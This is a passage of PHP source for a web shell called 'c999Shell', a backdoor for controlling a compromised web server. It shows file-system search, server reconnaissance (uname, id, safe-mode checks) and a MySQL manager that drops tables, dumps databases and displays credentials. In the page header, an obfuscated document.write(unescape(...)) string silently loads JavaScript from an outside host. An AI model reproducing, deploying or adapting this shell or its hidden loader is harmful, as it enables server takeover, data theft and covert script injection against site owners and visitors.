  667. if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
  668. }
  669. }
  670. if (!function_exists("mysql_create_db"))
  671. {
  672. function mysql_create_db($db,$sock="")
  673. {
  674. $sql = "CREATE DATABASE `".addslashes($db)."`;";
  675. if ($sock) {return mysql_query($sql,$sock);}
  676. else {return mysql_query($sql);}
  677. }
  678. }
  679. if (!function_exists("mysql_query_parse"))
  680. {
  681. function mysql_query_parse($query)
  682. {
  683. $query = trim($query);
  684. $arr = explode (" ",$query);
  685. /*array array()
  686. {
  687. "METHOD"=>array(output_type),
  688. "METHOD1"...
  689. ...
  690. }
  691. if output_type == 0, no output,
  692. if output_type == 1, no output if no error
  693. if output_type == 2, output without control-buttons
  694. if output_type == 3, output with control-buttons
  695. */
  696. $types = array(
  697. "SELECT"=>array(3,1),
  698. "SHOW"=>array(2,1),
  699. "DELETE"=>array(1),
  700. "DROP"=>array(1)
  701. );
  702. $result = array();
  703. $op = strtoupper($arr[0]);
  704. if (is_array($types[$op]))
  705. {
  706. $result["propertions"] = $types[$op];
  707. $result["query"] = $query;
  708. if ($types[$op] == 2)
  709. {
  710. foreach($arr as $k=>$v)
  711. {
  712. if (strtoupper($v) == "LIMIT")
  713. {
  714. $result["limit"] = $arr[$k+1];
  715. $result["limit"] = explode(",",$result["limit"]);
  716. if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
  717. unset($arr[$k],$arr[$k+1]);
  718. }
  719. }
  720. }
  721. }
  722. else {return FALSE;}
  723. }
  724. }
  725. if (!function_exists("c999fsearch"))
  726. {
  727. function c999fsearch($d)
  728. {
  729. global $found;
  730. global $found_d;
  731. global $found_f;
  732. global $search_i_f;
  733. global $search_i_d;
  734. global $a;
  735. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  736. $h = opendir($d);
  737. while (($f = readdir($h)) !== FALSE)
  738. {
  739. if($f != "." && $f != "..")
  740. {
  741. $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
  742. if (is_dir($d.$f))
  743. {
  744. $search_i_d++;
  745. if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
  746. if (!is_link($d.$f)) {c999fsearch($d.$f);}
  747. }
  748. else
  749. {
  750. $search_i_f++;
  751. if ($bool)
  752. {
  753. if (!empty($a["text"]))
  754. {
  755. $r = @file_get_contents($d.$f);
  756. if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
  757. if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
  758. if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
  759. else {$bool = strpos(" ".$r,$a["text"],1);}
  760. if ($a["text_not"]) {$bool = !$bool;}
  761. if ($bool) {$found[] = $d.$f; $found_f++;}
  762. }
  763. else {$found[] = $d.$f; $found_f++;}
  764. }
  765. }
  766. }
  767. }
  768. closedir($h);
  769. }
  770. }
  771. if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
  772. //Sending headers
  773. @ob_start();
  774. @ob_implicit_flush(0);
  775. function onphpshutdown()
  776. {
  777. global $gzipencode,$ft;
  778. if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
  779. {
  780. $v = @ob_get_contents();
  781. @ob_end_clean();
  782. @ob_start("ob_gzHandler");
  783. echo $v;
  784. @ob_end_flush();
  785. }
  786. }
  787. function c999shexit()
  788. {
  789. onphpshutdown();
  790. exit;
  791. }
  792. header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
  793. header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
  794. header("Cache-Control: no-store, no-cache, must-revalidate");
  795. header("Cache-Control: post-check=0, pre-check=0", FALSE);
  796. header("Pragma: no-cache");
  797. if (empty($tmpdir))
  798. {
  799. $tmpdir = ini_get("upload_tmp_dir");
  800. if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
  801. }
  802. $tmpdir = realpath($tmpdir);
  803. $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
  804. if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
  805. if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
  806. else {$tmpdir_logs = realpath($tmpdir_logs);}
  807. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
  808. {
  809. $safemode = TRUE;
  810. $hsafemode = "<font color=red>ON (secure)</font>";
  811. }
  812. else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
  813. $v = @ini_get("open_basedir");
  814. if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
  815. else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
  816. $sort = htmlspecialchars($sort);
  817. if (empty($sort)) {$sort = $sort_default;}
  818. $sort[1] = strtolower($sort[1]);
  819. $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
  820. if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
  821. $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
  822. @ini_set("highlight.bg",$highlight_bg); //FFFFFF
  823. @ini_set("highlight.comment",$highlight_comment); //#FF8000
  824. @ini_set("highlight.default",$highlight_default); //#0000BB
  825. @ini_set("highlight.html",$highlight_html); //#000000
  826. @ini_set("highlight.keyword",$highlight_keyword); //#007700
  827. @ini_set("highlight.string",$highlight_string); //#DD0000
  828. if (!is_array($actbox)) {$actbox = array();}
  829. $dspact = $act = htmlspecialchars($act);
  830. $disp_fullpath = $ls_arr = $notls = null;
  831. $ud = urlencode($d);
  832. ?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - phpshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b><Script Language='Javascript'>document.write(unescape('%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%72%35%37%2E%6D%6F%62%69%2F%69%6D%61%67%65%2F%6B%61%79%64%6F%6C%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E'));</Script>c999Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
  833. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  834. if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
  835. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  836. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  837. $d = str_replace("\\\\","\\",$d);
  838. $dispd = htmlspecialchars($d);
  839. $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
  840. $i = 0;
  841. foreach($pd as $b)
  842. {
  843. $t = "";
  844. $j = 0;
  845. foreach ($e as $r)
  846. {
  847. $t.= $r.DIRECTORY_SEPARATOR;
  848. if ($j == $i) {break;}
  849. $j++;
  850. }
  851. echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
  852. $i++;
  853. }
  854. echo "&nbsp;&nbsp;&nbsp;";
  855. if (is_writable($d))
  856. {
  857. $wd = TRUE;
  858. $wdt = "<font color=green>[ ok ]</font>";
  859. echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
  860. }
  861. else
  862. {
  863. $wd = FALSE;
  864. $wdt = "<font color=red>[ Read-Only ]</font>";
  865. echo "<b>".view_perms_color($d)."</b>";
  866. }
  867. if (is_callable("disk_free_space"))
  868. {
  869. $free = disk_free_space($d);
  870. $total = disk_total_space($d);
  871. if ($free === FALSE) {$free = 0;}
  872. if ($total === FALSE) {$total = 0;}
  873. if ($free < 0) {$free = 0;}
  874. if ($total < 0) {$total = 0;}
  875. $used = $total-$free;
  876. $free_percent = round(100/($total/$free),2);
  877. echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
  878. }
  879. echo "<br>";
  880. $letters = "";
  881. if ($win)
  882. {
  883. $v = explode("\\",$d);
  884. $v = $v[0];
  885. foreach (range("a","z") as $letter)
  886. {
  887. $bool = $isdiskette = in_array($letter,$safemode_diskettes);
  888. if (!$bool) {$bool = is_dir($letter.":\\");}
  889. if ($bool)
  890. {
  891. $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
  892. if ($letter.":" != $v) {$letters .= $letter;}
  893. else {$letters .= "<font color=green>".$letter."</font>";}
  894. $letters .= " ]</a> ";
  895. }
  896. }
  897. if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
  898. }
  899. if (count($quicklaunch) > 0)
  900. {
  901. foreach($quicklaunch as $item)
  902. {
  903. $item[1] = str_replace("%d",urlencode($d),$item[1]);
  904. $item[1] = str_replace("%sort",$sort,$item[1]);
  905. $v = realpath($d."..");
  906. if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
  907. $item[1] = str_replace("%upd",urlencode($v),$item[1]);
  908. echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
  909. }
  910. }
  911. echo "</p></td></tr></table><br>";
  912. if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
  913. echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
  914. if ($act == "") {$act = $dspact = "ls";}
  915. if ($act == "sql")
  916. {
  917. $sql_surl = $surl."act=sql";
  918. if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
  919. if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
  920. if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
  921. if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
  922. if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
  923. $sql_surl .= "&";
  924. ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
  925. if ($sql_server)
  926. {
  927. $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
  928. $err = mysql_smarterror();
  929. @mysql_select_db($sql_db,$sql_sock);
  930. if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
  931. }
  932. else {$sql_sock = FALSE;}
  933. echo "<b>SQL Manager:</b><br>";
  934. if (!$sql_sock)
  935. {
  936. if (!$sql_server) {echo "NO CONNECTION";}
  937. else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
  938. }
  939. else
  940. {
  941. $sqlquicklaunch = array();
  942. $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
  943. $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
  944. $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
  945. $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
  946. $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
  947. $sqlquicklaunch[] = array("Logout",$surl."act=sql");
  948. echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
  949. if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
  950. echo "</center>";
  951. }
  952. echo "</td></tr><tr>";
  953. if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
  954. else
  955. {
  956. //Start left panel
  957. if (!empty($sql_db))
  958. {
  959. ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
  960. $result = mysql_list_tables($sql_db);
  961. if (!$result) {echo mysql_smarterror();}
  962. else
  963. {
  964. echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
  965. $c = 0;
  966. while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
  967. if (!$c) {echo "No tables found in database.";}
  968. }
  969. }
  970. else
  971. {
  972. ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
  973. $result = mysql_list_dbs($sql_sock);
  974. if (!$result) {echo mysql_smarterror();}
  975. else
  976. {
  977. ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
  978. $c = 0;
  979. $dbs = "";
  980. while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
  981. echo "<option value=\"\">Databases (".$c.")</option>";
  982. echo $dbs;
  983. }
  984. ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
  985. }
  986. //End left panel
  987. echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
  988. //Start center panel
  989. $diplay = TRUE;
  990. if ($sql_db)
  991. {
  992. if (!is_numeric($c)) {$c = 0;}
  993. if ($c == 0) {$c = "no";}
  994. echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
  995. if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
  996. echo "</b></center>";
  997. $acts = array("","dump");
  998. if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  999. elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
  1000. elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
  1001. elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1002. elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1003. elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1004. elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  1005. elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
  1006. elseif ($sql_tbl_act == "insert")
  1007. {
  1008. if ($sql_tbl_insert_radio == 1)
  1009. {
  1010. $keys = "";
  1011. $akeys = array_keys($sql_tbl_insert);
  1012. foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
  1013. if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
  1014. $values = "";
  1015. $i = 0;
  1016. foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
  1017. if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
  1018. $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
  1019. $sql_act = "query";
  1020. $sql_tbl_act = "browse";
  1021. }
  1022. elseif ($sql_tbl_insert_radio == 2)
  1023. {
  1024. $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
  1025. $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
  1026. $result = mysql_query($sql_query) or print(mysql_smarterror());
  1027. $result = mysql_fetch_array($result, MYSQL_ASSOC);
  1028. $sql_act = "query";
  1029. $sql_tbl_act = "browse";
  1030. }
  1031. }
  1032. if ($sql_act == "query")
  1033. {
  1034. echo "<hr size=\"1\" noshade>";
  1035. if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  1036. if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  1037. if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
  1038. }
  1039. if (in_array($sql_act,$acts))
  1040. {
  1041. ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
  1042. if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
  1043. if ($sql_act == "newtbl")
  1044. {
  1045. echo "<b>";
  1046. if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
  1047. }
  1048. else {echo "Can't create DB \"".htmlspecialch